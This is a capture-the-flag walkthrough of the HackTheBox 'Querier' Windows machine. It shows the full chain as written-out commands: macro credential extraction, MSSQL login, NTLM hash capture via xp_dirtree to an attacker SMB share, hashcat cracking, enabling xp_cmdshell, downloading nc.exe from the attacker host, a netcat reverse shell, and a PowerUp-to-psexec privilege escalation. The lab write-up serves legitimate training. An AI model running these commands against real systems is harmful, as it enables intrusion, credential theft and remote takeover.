Hackthebox - Querier
Windows
Nmap
SMB
Let's try to list the shares
Let's try to connect to Reports. It works
We get a file that is an excel file with macro. With an online research we find this article by Nairuz Abulhul that mentions
Using this
olevba Currency\ Volume\ Report.xlsmwe are able to find the password for SQL server
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
MS-SQL Server
We can connect with mssqlclient.py from impacket
Note: I was struggling with the impacket command turns out that in order to work the password neeeds to have not double quotes or no quotes BUT single quotes (seems to be because of the dollar sign in the pass)
python3 /opt/impacket/examples/mssqlclient.py QUERIER/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-authWe get a shell this way
Here is an interesting article from hacktricks for mssql
We can list the tables
select * from volume.INFORMATION_SCHEMA.TABLES;
We can list users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
We do not have enough rights to create a user
SELECT CONCAT(sp.name, '***', master.sys.fn_varbintohexstr(sl.password_hash)) from master.sys.server_principals sp LEFT JOIN sys.sql_logins sl ON sp.principal_id = sl.principal_id
We can check the MS SQL version we have
SELECT @@VERSION AS 'SQL Server Version';
Itried this for cmd execution but it is not working
Check if we have other db
select name from sys.databases;
SELECT * FROM fn_my_permissions(NULL, 'SERVER');check our user perms
Ok we do not have much permissions we should check another way.
We can try something like this on Mark Mo's blog
Let's create a directory in our attacking machine
mkdir querysmbLet's launch smbserver
python3 /opt/impacket/examples/smbserver.py -smb2support myshare querysmb
Now we just need to do the exec command to drop the hash
exec xp_dirtree '\\10.10.14.7\myshare\'And it works
Now let's copy the hash in a txt and try to crack it using hashcat
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Let's try to connect again on sql but with this user.
Let's check our permissions with this user
SELECT * FROM fn_my_permissions(NULL, 'SERVER');We have many more than previously
Seems like we could event try xp_cmdshell again
Let's try to enable it
enable_xp_cmdshellif we issue our previous command again it works
We can get the user flag
EXEC master..xp_CMDShell 'type C:\Users\mssql-svc\Desktop\user.txt';Let's get nc.exe in our target
python3 -m http.server 80EXEC master..xp_CMDShell 'curl.exe -o C:\Users\mssql-svc\Desktop\nc.exe http://10.10.14.7/nc.exe'we get itEXEC master..xp_CMDShell 'dir C:\Users\mssql-svc\Desktop\'we check that it workedWe set a listener
rlwrap nc -lvp 4444EXEC master..xp_CMDShell 'C:\Users\mssql-svc\Desktop\nc.exe -e cmd.exe 10.10.14.7 4444'We get a shell
Privesc
systeminfoLet's use wes to see what exploit we could use
python3 /opt/wesng/wes.py --color sysinfo.txt | grep -B 3 -A 5 "Privilege Vulnerability"I will grep a few lines before and after to have the whole cve infoI also want to try PowerUp before using any kernel exploit
curl.exe -o C:\Users\mssql-svc\Desktop\powerup.ps1 http://10.10.14.7/PowerUp.ps1powershell -ep bypassImport-Module .\PowerUp.ps1Invoke-AllChecks | Out-String -Width 4096
We have a clear password for the Administrator
MyUnclesAreMarioAndLuigi!!1!python3 /opt/impacket/examples/psexec.py Administrator:'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125We have an admin shell we can grab the final flag!
type C:\Users\Administrator\Desktop\root.txt
Last updated